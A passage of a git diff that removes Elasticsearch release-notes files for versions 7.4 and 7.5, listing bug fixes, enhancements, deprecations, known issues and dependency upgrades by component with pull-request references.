{es-pull}44129[#44129] - -Geo:: -* Geo: fix geo query decomposition {es-pull}44924[#44924] (issue: {es-issue}44891[#44891]) -* Geo: add validator that only checks altitude {es-pull}43893[#43893] - -Highlighting:: -* Fix highlighting for script_score query {es-pull}46507[#46507] (issue: {es-issue}46471[#46471]) - -Infra/Core:: -* Always check that cgroup data is present {es-pull}45606[#45606] (issue: {es-issue}45396[#45396]) -* Safe publication of DelayedAllocationService and SnapshotShardsService {es-pull}45517[#45517] (issue: {es-issue}38560[#38560]) -* Add default CLI JVM options {es-pull}44545[#44545] (issues: {es-issue}219[#219], {es-issue}42021[#42021]) -* Fix decimal point parsing for date_optional_time {es-pull}43859[#43859] (issue: {es-issue}43730[#43730]) - -Infra/Logging:: -* Fix types field in JSON Search Slow Logs {es-pull}44641[#44641] -* Add types field to JSON slow logs in 7.x {es-pull}44592[#44592] (issues: {es-issue}41354[#41354], {es-issue}44178[#44178]) - -Infra/Packaging:: -* Add destructiveDistroTest meta task {es-pull}45762[#45762] -* Use bundled JDK in Sys V init {es-pull}45593[#45593] (issue: {es-issue}45542[#45542]) -* Restore setting up temp dir for windows service {es-pull}44541[#44541] - -Infra/Plugins:: -* Do not checksum all bytes at once in plugin install {es-pull}44649[#44649] (issue: {es-issue}44545[#44545]) - -Infra/REST API:: -* Improve error message when index settings are not a map {es-pull}45588[#45588] (issue: {es-issue}45126[#45126]) -* Add is_write_index column to cat.aliases {es-pull}44772[#44772] -* Fix URL documentation in API specs {es-pull}44487[#44487] - -Infra/Scripting:: -* Fix bugs in Painless SCatch node {es-pull}45880[#45880] -* Fix JodaCompatibleZonedDateTime casts in Painless {es-pull}44874[#44874] - -Infra/Settings:: -* bug fix about elasticsearch.common.settings.Settings.processSetting {es-pull}44047[#44047] (issue: {es-issue}43791[#43791]) - -Machine Learning:: -* Fix two datafeed flush lockup bugs {es-pull}46982[#46982] -* Throw an error when a datafeed needs CCS but it is not enabled for the node {es-pull}46044[#46044] (issue: {es-issue}46025[#46025]) -* Handle "null" value of Estimate memory usage API response gracefully. {es-pull}45726[#45726] (issue: {es-issue}44699[#44699]) -* Remove timeout on waiting for data frame analytics result processor to complete {es-pull}45724[#45724] (issue: {es-issue}45723[#45723]) -* Check dest index is empty when starting data frame analytics {es-pull}45094[#45094] -* Catch any error thrown while closing data frame analytics process {es-pull}44958[#44958] -* Treat PostDataActionResponse.DataCounts.bucketCount as incremental rather than absolute (total). {es-pull}44803[#44803] (issue: {es-issue}44792[#44792]) -* Treat big changes in searchCount as significant and persist the document after such changes {es-pull}44413[#44413] (issues: {es-issue}44196[#44196], {es-issue}44335[#44335]) -* Update .ml-config mappings before indexing job, datafeed or data frame analytics config {es-pull}44216[#44216] (issue: {es-issue}44263[#44263]) -* Wait for .ml-config primary before assigning persistent tasks {es-pull}44170[#44170] (issue: {es-issue}44156[#44156]) -* Fix ML memory tracker lockup when inner step fails {es-pull}44158[#44158] (issue: {es-issue}44156[#44156]) -* Fix datafeed checks when a concrete remote index is present {es-pull}43923[#43923] (issue: {es-issue}42113[#42113]) -* Rename outlier detection method values `knn` and `tnn` to `distance_kth_nn` and `distance_knn` -respectively to match the API. 
{ml-pull}598[#598] -* Fix occasional (non-deterministic) reinitialisation of modeling for the `lat_long` -function. {ml-pull}641[#641] - -Mapping:: -* Make sure to validate the type before attempting to merge a new mapping. {es-pull}45157[#45157] (issues: {es-issue}29316[#29316], {es-issue}43012[#43012]) -* Ensure field caps doesn't error on rank feature fields. {es-pull}44370[#44370] (issue: {es-issue}44330[#44330]) -* Prevent types deprecation warning for indices.exists requests {es-pull}43963[#43963] (issue: {es-issue}43905[#43905]) -* Add include_type_name in indices.exitst REST API spec {es-pull}43910[#43910] (issue: {es-issue}43905[#43905]) - -Network:: -* Fix Broken HTTP Request Breaking Channel Closing {es-pull}45958[#45958] (issues: {es-issue}43362[#43362], {es-issue}43850[#43850]) -* Fix plaintext on TLS port logging {es-pull}45852[#45852] (issue: {es-issue}32688[#32688]) -* transport.publish_address should contain CNAME {es-pull}45626[#45626] (issues: {es-issue}32806[#32806], {es-issue}39970[#39970]) -* Fix bug in copying bytes for socket write {es-pull}45463[#45463] (issue: {es-issue}45444[#45444]) - -Recovery:: -* Never release store using CancellableThreads {es-pull}45409[#45409] (issues: {es-issue}45136[#45136], {es-issue}45237[#45237]) -* Remove leniency in reset engine from translog {es-pull}44711[#44711] - -Rollup:: -* Fix Rollup job creation to work with templates {es-pull}43943[#43943] - -SQL:: -* SQL: Properly handle indices with no/empty mapping {es-pull}46775[#46775] (issue: {es-issue}46757[#46757]) -* SQL: improve ResultSet behavior when no rows are available {es-pull}46753[#46753] (issue: {es-issue}46750[#46750]) -* SQL: use the correct data type for types conversion {es-pull}46574[#46574] (issue: {es-issue}46090[#46090]) -* SQL: Fix issue with common type resolution {es-pull}46565[#46565] (issue: {es-issue}46551[#46551]) -* SQL: fix scripting for grouped by datetime functions {es-pull}46421[#46421] (issue: {es-issue}40241[#40241]) -* SQL: Use null schema response {es-pull}46386[#46386] (issue: {es-issue}46381[#46381]) -* SQL: Fix issue with IIF function when condition folds {es-pull}46290[#46290] (issue: {es-issue}46268[#46268]) -* SQL: Fix issue with DataType for CASE with NULL {es-pull}46173[#46173] (issue: {es-issue}46032[#46032]) -* SQL: adds format parameter to range queries for constant date comparisons {es-pull}45326[#45326] (issue: {es-issue}45139[#45139]) -* SQL: uniquely named inner_hits sections for each nested field condition {es-pull}45039[#45039] (issues: {es-issue}33080[#33080], {es-issue}44544[#44544]) -* SQL: fix URI path being lost in case of hosted ES scenario {es-pull}44776[#44776] (issue: {es-issue}44721[#44721]) -* SQL: change the size of the list of concrete indices when resolving multiple indices {es-pull}43878[#43878] (issue: {es-issue}43876[#43876]) -* SQL: handle double quotes escaping {es-pull}43829[#43829] (issue: {es-issue}43810[#43810]) -* SQL: add pretty printing to JSON format {es-pull}43756[#43756] -* SQL: handle SQL not being available in a more graceful way {es-pull}43665[#43665] (issue: {es-issue}41279[#41279]) - -Search:: -* Multi-get requests should wait for search active {es-pull}46283[#46283] (issue: {es-issue}27500[#27500]) -* Ensure top docs optimization is fully disabled for queries with unbounded max scores. 
{es-pull}46105[#46105] (issue: {es-issue}45933[#45933]) -* Disallow partial results when shard unavailable {es-pull}45739[#45739] (issue: {es-issue}42612[#42612]) -* Prevent Leaking Search Tasks on Exceptions in FetchSearchPhase and DfsQueryPhase {es-pull}45500[#45500] -* Fix an NPE when requesting inner hits and _source is disabled. {es-pull}44836[#44836] (issue: {es-issue}43517[#43517]) -* Don't use index_phrases on graph queries {es-pull}44340[#44340] (issue: {es-issue}43976[#43976]) - -Security:: -* Initialize document subset bit set cache used for DLS {es-pull}46211[#46211] (issue: {es-issue}45147[#45147]) -* Fix .security-* indices auto-create {es-pull}44918[#44918] -* SecurityIndexManager handle RuntimeException while reading mapping {es-pull}44409[#44409] -* Do not swallow I/O exception getting authentication {es-pull}44398[#44398] (issues: {es-issue}44172[#44172], {es-issue}44397[#44397]) -* Use system context for looking up connected nodes {es-pull}43991[#43991] (issue: {es-issue}43974[#43974]) - -Snapshot/Restore:: -* Fix Bug in Snapshot Status Response Timestamps {es-pull}46919[#46919] (issue: {es-issue}46913[#46913]) -* GCS deleteBlobsIgnoringIfNotExists should catch StorageException {es-pull}46832[#46832] (issue: {es-issue}46772[#46772]) -* Fix TransportSnapshotsStatusAction ThreadPool Use {es-pull}45824[#45824] -* Stop Executing SLM Policy Transport Action on Snapshot Pool {es-pull}45727[#45727] (issue: {es-issue}45594[#45594]) -* Check again on-going snapshots/restores of indices before closing {es-pull}43873[#43873] -* Make Timestamps Returned by Snapshot APIs Consistent {es-pull}43148[#43148] (issue: {es-issue}43074[#43074]) -* Recursively Delete Unreferenced Index Directories {es-pull}42189[#42189] (issue: {es-issue}13159[#13159]) - -Task Management:: -* Catch AllocatedTask registration failures {es-pull}45300[#45300] - -Transforms:: -* Use field_caps API for mapping deduction {es-pull}46703[#46703] (issue: {es-issue}46694[#46694]) -* Fix off-by-one error in checkpoint operations_behind {es-pull}46235[#46235] -* Moves failure state transition for MT safety {es-pull}45676[#45676] (issue: {es-issue}45664[#45664]) -* Fix _start?force=true bug {es-pull}45660[#45660] -* Fix failure state transitions and race condition {es-pull}45627[#45627] (issues: {es-issue}45562[#45562], {es-issue}45609[#45609]) -* Fix starting a batch data frame after stopping at runtime {es-pull}45340[#45340] (issues: {es-issue}44219[#44219], {es-issue}45339[#45339]) -* Fix null aggregation handling in indexer {es-pull}45061[#45061] (issue: {es-issue}44906[#44906]) -* Unify validation exceptions between PUT and _preview {es-pull}44983[#44983] (issue: {es-issue}44953[#44953]) -* Treat bulk index failures as an indexing failure {es-pull}44351[#44351] (issue: {es-issue}44101[#44101]) -* Prevent task from attempting to run when failed {es-pull}44239[#44239] (issue: {es-issue}44121[#44121]) -* Respond with 409 status code when failing _stop {es-pull}44231[#44231] (issue: {es-issue}44103[#44103]) -* Add index validations to _start data frame transform {es-pull}44191[#44191] (issue: {es-issue}44104[#44104]) -* Data frame task failure does not make a 500 response {es-pull}44058[#44058] (issue: {es-issue}44011[#44011]) -* Audit message missing for autostop {es-pull}43984[#43984] (issue: {es-issue}43977[#43977]) - -[[regression-7.4.0]] -[discrete] -=== Regressions - -Aggregations:: -* Implement rounding optimization for fixed offset timezones {es-pull}46670[#46670] (issue: {es-issue}45702[#45702]) - - - 
-[[upgrade-7.4.0]] -[discrete] -=== Upgrades - -Infra/Core:: -* Update joda to 2.10.3 {es-pull}45495[#45495] - -Infra/Packaging:: -* Upgrade to JDK 12.0.2 {es-pull}45172[#45172] - -Network:: -* Upgrade to Netty 4.1.38 {es-pull}45132[#45132] - -Search:: -* Upgrade to lucene snapshot 8.3.0-snapshot-8dd116a6158 {es-pull}45604[#45604] (issue: {es-issue}43976[#43976]) diff --git a/docs/reference/release-notes/7.5.asciidoc b/docs/reference/release-notes/7.5.asciidoc deleted file mode 100644 index 141bcc55b44..00000000000 --- a/docs/reference/release-notes/7.5.asciidoc +++ /dev/null @@ -1,581 +0,0 @@ -[[release-notes-7.5.2]] -== {es} version 7.5.2 - -[[enhancement-7.5.2]] -[discrete] -=== Enhancements - -Features/Ingest:: -* Fork recursive calls in Foreach processor {es-pull}50514[#50514] - -Infra/Core:: -* Fix unintended debug logging in subclasses of TransportMasterNodeAction {es-pull}50839[#50839] (issues: {es-issue}50056[#50056], {es-issue}50074[#50074], {es-issue}50076[#50076]) - - -[[bug-7.5.2]] -[discrete] -=== Bug fixes - -Analysis:: -* Fix caching for PreConfiguredTokenFilter {es-pull}50912[#50912] (issue: {es-issue}50734[#50734]) - -CRUD:: -* Block too many concurrent mapping updates {es-pull}51038[#51038] (issue: {es-issue}50670[#50670]) - -Engine:: -* Account soft-deletes in FrozenEngine {es-pull}51192[#51192] (issue: {es-issue}50775[#50775]) - -Features/ILM+SLM:: -* Fix SLM check for restore in progress {es-pull}50868[#50868] - -Features/Ingest:: -* Fix ingest simulate response document order if processor executes async {es-pull}50244[#50244] - -Features/Java Low Level REST Client:: -* Improve warning value extraction performance in response {es-pull}50208[#50208] (issue: {es-issue}24114[#24114]) - -Machine Learning:: -* Fixes potential memory corruption or inconsistent state when background -persisting categorizer state. {ml-pull}921[#921] - -Mapping:: -* Ensure that field collapsing works with field aliases. {es-pull}50722[#50722] (issues: {es-issue}32648[#32648], {es-issue}50121[#50121]) -* Fix meta version of task index mapping {es-pull}50363[#50363] (issue: {es-issue}48393[#48393]) - -Recovery:: -* Check allocation ID when failing shard on recovery {es-pull}50656[#50656] (issue: {es-issue}50508[#50508]) - -SQL:: -* Change the way unsupported data types fields are handled {es-pull}50823[#50823] -* Optimization fixes for conjunction merges {es-pull}50703[#50703] (issue: {es-issue}49637[#49637]) -* Fix issue with CAST and NULL checking. {es-pull}50371[#50371] (issue: {es-issue}50191[#50191]) -* Fix NPE for JdbcResultSet.getDate(param, Calendar) calls {es-pull}50184[#50184] (issue: {es-issue}50174[#50174]) - -Search:: -* Fix upgrade of custom similarity {es-pull}50851[#50851] (issue: {es-issue}50763[#50763]) - -Security:: -* Always consume the request body of `has_privileges` API {es-pull}50298[#50298] (issue: {es-issue}50288[#50288]) - - -[[release-notes-7.5.1]] -== {es} version 7.5.1 - -Also see <>. 
- -[[enhancement-7.5.1]] -[discrete] -=== Enhancements - -Features/Watcher:: -* Log attachment generation failures {es-pull}50080[#50080] - -Network:: -* Netty4: switch to composite cumulator {es-pull}49478[#49478] - - - -[[bug-7.5.1]] -[discrete] -=== Bug fixes - -Authentication:: -* Fix iterate-from-1 bug in smart realm order {es-pull}49473[#49473] - -CRUD:: -* Do not mutate request on scripted upsert {es-pull}49578[#49578] (issue: {es-issue}48670[#48670]) - -Cluster Coordination:: -* Make elasticsearch-node tools custom metadata-aware {es-pull}48390[#48390] - -Engine:: -* Account trimAboveSeqNo in committed translog generation {es-pull}50205[#50205] (issue: {es-issue}49970[#49970]) - -Features/ILM+SLM:: -* Handle failure to retrieve ILM policy step better {es-pull}49193[#49193] (issue: {es-pull}49128[#49128]) - -Features/Java High Level REST Client:: -* Support es7 node http publish_address format {es-pull}49279[#49279] (issue: {es-issue}48950[#48950]) - -Geo:: -* Fix handling of circles in legacy geo_shape queries {es-pull}49410[#49410] (issue: {es-issue}49296[#49296]) - -Infra/Packaging:: -* Extend systemd timeout during startup {es-pull}49784[#49784] (issue: {es-issue}49593[#49593]) - -Machine Learning:: -* Use query in cardinality check {es-pull}49939[#49939] -* Fix expired job results deletion audit message {es-pull}49560[#49560] (issue: {es-issue}49549[#49549]) -* Apply source query on data frame analytics memory estimation {es-pull}49527[#49527] (issue: {es-issue}49454[#49454]) -* Stop timing stats failure propagation {es-pull}49495[#49495] - -Mapping:: -* Improve DateFieldMapper `ignore_malformed` handling {es-pull}50090[#50090] (issue: {es-issue}50081[#50081]) - -Recovery:: -* Migrate peer recovery from translog to retention lease {es-pull}49448[#49448] (issue: {es-issue}45136[#45136]) - -SQL:: -* COUNT DISTINCT returns 0 instead of NULL for no matching docs {es-pull}50037[#50037] (issue: {es-issue}50013[#50013]) -* Fix LOCATE function optional parameter handling {es-pull}49666[#49666] (issue: {es-issue}49557[#49557]) -* Fix NULL handling for FLOOR and CEIL functions {es-pull}49644[#49644] (issue: {es-issue}49556[#49556]) -* Handle NULL arithmetic operations with INTERVALs {es-pull}49633[#49633] (issue: {es-issue}49297[#49297]) -* Fix issue with GROUP BY YEAR() {es-pull}49559[#49559] (issue: {es-issue}49386[#49386]) -* Fix issue with CASE/IIF pre-calculating results {es-pull}49553[#49553] (issue: {es-issue}49388[#49388]) -* Fix issue with folding of CASE/IIF {es-pull}49449[#49449] (issue: {es-issue}49387[#49387]) -* Fix issues with WEEK/ISO_WEEK/DATEDIFF {es-pull}49405[#49405] (issues: {es-issue}48209[#48209], {es-issue}49376[#49376]) - -Snapshot/Restore:: -* Fix Index Deletion during Snapshot Finalization {es-pull}50202[#50202] (issues: {es-issue}45689[#45689], {es-issue}50200[#50200]) - -Transform:: -* Fix possible audit logging disappearance after rolling upgrade {es-pull}49731[#49731] (issue: {es-issue}49730[#49730]) - -[[release-notes-7.5.0]] -== {es} version 7.5.0 - -Also see <>. - -[[known-issues-7.5.0]] -[discrete] -=== Known issues - -* Applying deletes or updates on an index after it has been shrunk may corrupt -the index. In order to prevent this issue, it is recommended to stop shrinking -read-write indices. For read-only indices, it is recommended to force-merge -indices after shrinking, which significantly reduces the likelihood of this -corruption in the case that deletes/updates would be applied by mistake. This -bug is fixed in {es} 7.7 and later versions. 
More details can be found on the -https://issues.apache.org/jira/browse/LUCENE-9300[corresponding issue]. - -* Stop all {transforms} during a rolling upgrade to 7.5. -If a {transform} is running during upgrade, the {transform} audit index might disappear. -(issue: {es-issue}/49730[#49730]) - -* Indices created in 6.x with <> and <> fields using formats -that are incompatible with java.time patterns will cause parsing errors, incorrect date calculations or wrong search results. -https://github.com/elastic/elasticsearch/pull/52555 -This is fixed in {es} 7.7 and later versions. - -[[breaking-7.5.0]] -[discrete] -=== Breaking changes - -Search:: -* Add support for aliases in queries on _index. {es-pull}46640[#46640] (issues: {es-issue}23306[#23306], {es-issue}34089[#34089]) - - - -[[deprecation-7.5.0]] -[discrete] -=== Deprecations - -Aggregations:: -* Deprecate the "index.max_adjacency_matrix_filters" setting {es-pull}46394[#46394] (issue: {es-issue}46324[#46324]) - -Allocation:: -* Deprecate include_relocations setting {es-pull}47443[#47443] (issue: {es-issue}46079[#46079]) - -Mapping:: -* Deprecate `_field_names` disabling {es-pull}42854[#42854] (issue: {es-issue}27239[#27239]) - -Search:: -* Reject regexp queries on the _index field. {es-pull}46945[#46945] (issues: {es-issue}34089[#34089], {es-issue}46640[#46640]) - - - -[[feature-7.5.0]] -[discrete] -=== New features - -Features/ILM+SLM:: -* Add API to execute SLM retention on-demand {es-pull}47405[#47405] (issues: {es-issue}43663[#43663], {es-issue}46508[#46508]) -* Add retention to Snapshot Lifecycle Management {es-pull}46407[#46407] (issues: {es-issue}38461[#38461], {es-issue}43663[#43663], {es-issue}45362[#45362]) - -Features/Ingest:: -* Add enrich processor {es-pull}48039[#48039] (issue: {es-issue}32789[#32789]) - -Machine Learning:: -* Implement evaluation API for multiclass classification problem {es-pull}47126[#47126] (issue: {es-issue}46735[#46735]) -* Implement new analysis type: classification {es-pull}46537[#46537] (issue: {es-issue}46735[#46735]) -* Add audit messages for Data Frame Analytics {es-pull}46521[#46521] (issue: {es-issue}184[#184]) -* Implement DataFrameAnalyticsAuditMessage and DataFrameAnalyticsAuditor {es-pull}45967[#45967] - -SQL:: -* SQL: Implement DATEDIFF function {es-pull}47920[#47920] (issue: {es-issue}47919[#47919]) -* SQL: Implement DATEADD function {es-pull}47747[#47747] (issue: {es-issue}47746[#47746]) -* SQL: Implement DATE_PART function {es-pull}47206[#47206] (issue: {es-issue}46372[#46372]) -* SQL: Add alias DATETRUNC to DATE_TRUNC function {es-pull}47173[#47173] (issue: {es-issue}46473[#46473]) -* SQL: Add PIVOT support {es-pull}46489[#46489] -* SQL: Implement DATE_TRUNC function {es-pull}46473[#46473] (issue: {es-issue}46319[#46319]) - - - -[[enhancement-7.5.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Adjacency_matrix aggregation memory usage optimisation. 
{es-pull}46257[#46257] (issue: {es-issue}46212[#46212]) -* Support geotile_grid aggregation in composite agg sources {es-pull}45810[#45810] (issue: {es-issue}40568[#40568]) - -Allocation:: -* Do not cancel ongoing recovery for noop copy on broken node {es-pull}48265[#48265] (issue: {es-issue}47974[#47974]) -* Shrink should not touch max_retries {es-pull}47719[#47719] -* Re-fetch shard info of primary when new node joins {es-pull}47035[#47035] (issues: {es-issue}42518[#42518], {es-issue}46959[#46959]) -* Sequence number based replica allocation {es-pull}46959[#46959] (issue: {es-issue}46318[#46318]) - -Authorization:: -* Add support to retrieve all API keys if user has privilege {es-pull}47274[#47274] (issue: {es-issue}46887[#46887]) -* Add 'create_doc' index privilege {es-pull}45806[#45806] -* Reducing privileges needed by built-in beats_admin role {es-pull}41586[#41586] - -CCR:: -* Add Pause/Resume Auto-Follower APIs to High Level REST Client {es-pull}47989[#47989] (issue: {es-issue}47510[#47510]) -* Add Pause/Resume Auto Follower APIs {es-pull}47510[#47510] (issue: {es-issue}46665[#46665]) - -CRUD:: -* Allow optype CREATE for append-only indexing operations {es-pull}47169[#47169] - -Cluster Coordination:: -* Warn on slow metadata persistence {es-pull}47005[#47005] -* Improve LeaderCheck rejection messages {es-pull}46998[#46998] - -Engine:: -* Do not warm up searcher in engine constructor {es-pull}48605[#48605] (issue: {es-issue}47186[#47186]) -* Refresh should not acquire readLock {es-pull}48414[#48414] (issue: {es-issue}47186[#47186]) -* Avoid unneeded refresh with concurrent realtime gets {es-pull}47895[#47895] -* sync before trimUnreferencedReaders to improve index preformance {es-pull}47790[#47790] (issues: {es-issue}46201[#46201], {es-issue}46203[#46203]) -* Limit number of retaining translog files for peer recovery {es-pull}47414[#47414] -* Remove isRecovering method from Engine {es-pull}47039[#47039] - -Features/ILM+SLM:: -* Separate SLM stop/start/status API from ILM {es-pull}47710[#47710] (issue: {es-issue}43663[#43663]) -* Set default SLM retention invocation time {es-pull}47604[#47604] (issue: {es-issue}43663[#43663]) -* ILM: Skip rolling indexes that are already rolled {es-pull}47324[#47324] (issue: {es-issue}44175[#44175]) -* Add support for POST requests to SLM Execute API {es-pull}47061[#47061] -* Wait for snapshot completion in SLM snapshot invocation {es-pull}47051[#47051] (issues: {es-issue}38461[#38461], {es-issue}43663[#43663]) -* Add node setting for disabling SLM {es-pull}46794[#46794] (issue: {es-issue}38461[#38461]) -* ILM: parse origination date from index name {es-pull}46755[#46755] (issues: {es-issue}42449[#42449], {es-issue}46561[#46561]) -* [ILM] Add date setting to calculate index age {es-pull}46561[#46561] (issue: {es-issue}42449[#42449]) - -Features/Ingest:: -* Add the ability to require an ingest pipeline {es-pull}46847[#46847] - -Features/Java High Level REST Client:: -* add function submitDeleteByQueryTask in class RestHighLevelClient {es-pull}46833[#46833] -* return Cancellable in RestHighLevelClient {es-pull}45688[#45688] (issue: {es-issue}44802[#44802]) - -Features/Java Low Level REST Client:: -* Add cloudId builder to the HLRC {es-pull}47868[#47868] -* Add support for cancelling async requests in low-level REST client {es-pull}45379[#45379] (issues: {es-issue}43332[#43332], {es-issue}44802[#44802]) - -Features/Monitoring:: -* Remove hard coded version_created in default monitoring alerts {es-pull}47744[#47744] - -Infra/Circuit Breakers:: -* Emit log 
message when parent circuit breaker trips {es-pull}47000[#47000] -* Fix G1 GC default IHOP {es-pull}46169[#46169] - -Infra/Core:: -* Introduce system JVM options {es-pull}48252[#48252] (issue: {es-issue}48222[#48222]) -* Set start of the week to Monday for root locale {es-pull}43652[#43652] (issues: {es-issue}41670[#41670], {es-issue}42588[#42588], {es-issue}43275[#43275]) - -Infra/Packaging:: -* Package the JDK into jdk.app on macOS {es-pull}48765[#48765] -* Move ES_TMPDIR substitution into jvm options parser {es-pull}47189[#47189] (issue: {es-issue}47133[#47133]) -* Clarify missing java error message {es-pull}46160[#46160] (issue: {es-issue}44139[#44139]) - -Infra/Scripting:: -* Add explanations to script score queries {es-pull}46693[#46693] - -Infra/Settings:: -* Do not reference values for filtered settings {es-pull}48066[#48066] -* Allow setting validation against arbitrary types {es-pull}47264[#47264] (issue: {es-issue}25560[#25560]) -* Clarify error message on keystore write permissions {es-pull}46321[#46321] -* Add more meaningful keystore version mismatch errors {es-pull}46291[#46291] (issue: {es-issue}44624[#44624]) - -Machine Learning:: -* Throw an exception when memory usage estimation endpoint encounters empty data frame. {es-pull}49143[#49143] (issue: {es-issue}49140[#49140]) -* Change format of MulticlassConfusionMatrix result to be more self-explanatory {es-pull}48174[#48174] (issue: {es-issue}46735[#46735]) -* Make num_top_classes parameter's default value equal to 2 {es-pull}48119[#48119] (issue: {es-issue}46735[#46735]) -* [ML] Add option to stop datafeed that finds no data {es-pull}47922[#47922] -* Allow integer types for classification's dependent variable {es-pull}47902[#47902] (issue: {es-issue}46735[#46735]) -* [ML] Add lazy assignment job config option {es-pull}47726[#47726] -* [ML] Additional outlier detection parameters {es-pull}47600[#47600] -* [ML] More accurate job memory overhead {es-pull}47516[#47516] -* [ML] Throttle the delete-by-query of expired results {es-pull}47177[#47177] (issues: {es-issue}47003[#47003], {es-issue}47103[#47103]) - -Mapping:: -* Add migration tool checks for _field_names disabling {es-pull}46972[#46972] (issues: {es-issue}42854[#42854], {es-issue}46681[#46681]) - -Network:: -* Introduce simple remote connection strategy {es-pull}47480[#47480] -* Enhanced logging when transport is misconfigured to talk to HTTP port {es-pull}45964[#45964] (issue: {es-issue}32688[#32688]) - -Recovery:: -* Do not send recovery requests with CancellableThreads {es-pull}46287[#46287] (issue: {es-issue}46178[#46178]) - -SQL:: -* SQL: make date/datetime and interval types compatible in conditional functions {es-pull}47595[#47595] (issue: {es-issue}46674[#46674]) -* SQL: use calendar interval of 1y instead of fixed interval for grouping by YEAR and HISTOGRAMs {es-pull}47558[#47558] (issue: {es-issue}40162[#40162]) -* SQL: Support queries with HAVING over SELECT {es-pull}46709[#46709] (issue: {es-issue}37051[#37051]) -* SQL: Add support for shape type {es-pull}46464[#46464] (issues: {es-issue}43644[#43644], {es-issue}46412[#46412]) - -Search:: -* Remove response search phase from ExpandSearchPhase {es-pull}48401[#48401] -* Add builder for distance_feature to QueryBuilders {es-pull}47846[#47846] (issue: {es-issue}47767[#47767]) -* Fold InitialSearchPhase into AbstractSearchAsyncAction {es-pull}47182[#47182] -* max_children exist only in top level nested sort {es-pull}46731[#46731] -* First round of optimizations for vector functions. 
{es-pull}46294[#46294] (issues: {es-issue}45390[#45390], {es-issue}45936[#45936], {es-issue}46103[#46103], {es-issue}46155[#46155], {es-issue}46190[#46190], {es-issue}46202[#46202]) -* Throw exception in scroll requests using `from` {es-pull}46087[#46087] (issues: {es-issue}26235[#26235], {es-issue}44493[#44493], {es-issue}9373[#9373]) - -Snapshot/Restore:: -* Track Repository Gen. in BlobStoreRepository {es-pull}48944[#48944] (issues: {es-issue}38941[#38941], {es-issue}47520[#47520], {es-issue}47834[#47834], {es-issue}49048[#49048]) -* Resume partial download from S3 on connection drop {es-pull}46589[#46589] -* More Efficient Ordering of Shard Upload Execution {es-pull}42791[#42791] - -Transform:: -* [ML][Transforms] allow executor to call start on started task {es-pull}46347[#46347] -* [ML-DataFrame] improve error message for timeout case in stop {es-pull}46131[#46131] (issue: {es-issue}45610[#45610]) -* [ML][Data Frame] add support for `wait_for_checkpoint` flag on `_stop` API {es-pull}45469[#45469] (issue: {es-issue}45293[#45293]) - - - -[[bug-7.5.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Fix ignoring missing values in min/max aggregations {es-pull}48970[#48970] (issue: {es-issue}48905[#48905]) -* DocValueFormat implementation for date range fields {es-pull}47472[#47472] (issues: {es-issue}47323[#47323], {es-issue}47469[#47469]) - -Allocation:: -* Auto-expand replicated closed indices {es-pull}48973[#48973] -* Handle negative free disk space in deciders {es-pull}48392[#48392] (issue: {es-issue}48380[#48380]) -* Dangling indices strip aliases {es-pull}47581[#47581] -* Cancel recoveries even if all shards assigned {es-pull}46520[#46520] -* Fail allocation of new primaries in empty cluster {es-pull}43284[#43284] (issue: {es-issue}41073[#41073]) - -Analysis:: -* Reset Token position on reuse in `predicate_token_filter` {es-pull}47424[#47424] (issue: {es-issue}47197[#47197]) - -Audit:: -* Audit log filter and marker {es-pull}45456[#45456] (issue: {es-issue}47251[#47251]) - -Authentication:: -* Add owner flag parameter to the rest spec {es-pull}48500[#48500] (issue: {es-issue}48499[#48499]) -* Add populate_user_metadata in OIDC realm {es-pull}48357[#48357] (issue: {es-issue}48217[#48217]) -* Remove unnecessary details logged for OIDC {es-pull}48271[#48271] -* Fix AD realm additional metadata {es-pull}47179[#47179] (issue: {es-issue}45848[#45848]) -* Fallback to realm authc if ApiKey fails {es-pull}46538[#46538] -* PKI realm accept only verified certificates {es-pull}45590[#45590] - -Authorization:: -* Fix security origin for TokenService#findActiveTokensFor... 
{es-pull}47418[#47418] (issue: {es-issue}47151[#47151]) -* Use 'should' clause instead of 'filter' when querying native privileges {es-pull}47019[#47019] -* Do not rewrite aliases on remove-index from aliases requests {es-pull}46989[#46989] -* Validate index and cluster privilege names when creating a role {es-pull}46361[#46361] (issue: {es-issue}29703[#29703]) -* Validate `query` field when creating roles {es-pull}46275[#46275] (issue: {es-issue}34252[#34252]) - -CCR:: -* CCR should auto-retry rejected execution exceptions {es-pull}49213[#49213] -* Do not auto-follow closed indices {es-pull}47721[#47721] (issue: {es-issue}47582[#47582]) -* Relax maxSeqNoOfUpdates assertion in FollowingEngine {es-pull}47188[#47188] (issue: {es-issue}47137[#47137]) -* Handle lower retaining seqno retention lease error {es-pull}46420[#46420] (issues: {es-issue}46013[#46013], {es-issue}46416[#46416]) - -CRUD:: -* Close query cache on index service creation failure {es-pull}48230[#48230] (issue: {es-issue}48186[#48186]) -* Use optype CREATE for single auto-id index requests {es-pull}47353[#47353] -* Ignore replication for noop updates {es-pull}46458[#46458] (issues: {es-issue}41065[#41065], {es-issue}44603[#44603], {es-issue}46366[#46366]) - -Client:: -* Correct default refresh policy for security APIs {es-pull}46896[#46896] - -Cluster Coordination:: -* Ignore metadata of deleted indices at start {es-pull}48918[#48918] -* Omit writing index metadata for non-replicated closed indices on data-only node {es-pull}47285[#47285] (issue: {es-issue}47276[#47276]) -* Assert no exceptions during state application {es-pull}47090[#47090] (issue: {es-issue}47038[#47038]) -* Remove trailing comma from nodes lists {es-pull}46484[#46484] - -Distributed:: -* Closed shard should never open new engine {es-pull}47186[#47186] (issues: {es-issue}45263[#45263], {es-issue}47060[#47060]) -* Fix false positive out of sync warning in synced-flush {es-pull}46576[#46576] (issues: {es-issue}28464[#28464], {es-issue}30244[#30244]) -* Suppress warning logs from background sync on relocated primary {es-pull}46247[#46247] (issues: {es-issue}40800[#40800], {es-issue}42241[#42241]) - -Engine:: -* Greedily advance safe commit on new global checkpoint {es-pull}48559[#48559] (issue: {es-issue}48532[#48532]) - -Features/ILM+SLM:: -* Don't halt policy execution on policy trigger exception {es-pull}49128[#49128] -* Don't schedule SLM jobs when services have been stopped {es-pull}48658[#48658] (issue: {es-issue}47749[#47749]) -* Ensure SLM stats does not block an in-place upgrade from 7.4 {es-pull}48367[#48367] -* Ensure SLM stats does not block an in-place upgrade from 7.4 {es-pull}48361[#48361] -* Add SLM support to xpack usage and info APIs {es-pull}48096[#48096] (issue: {es-issue}43663[#43663]) -* Change policy_id to list type in slm.get_lifecycle {es-pull}47766[#47766] (issue: {es-issue}47765[#47765]) -* Throw error retrieving non-existent SLM policy {es-pull}47679[#47679] (issue: 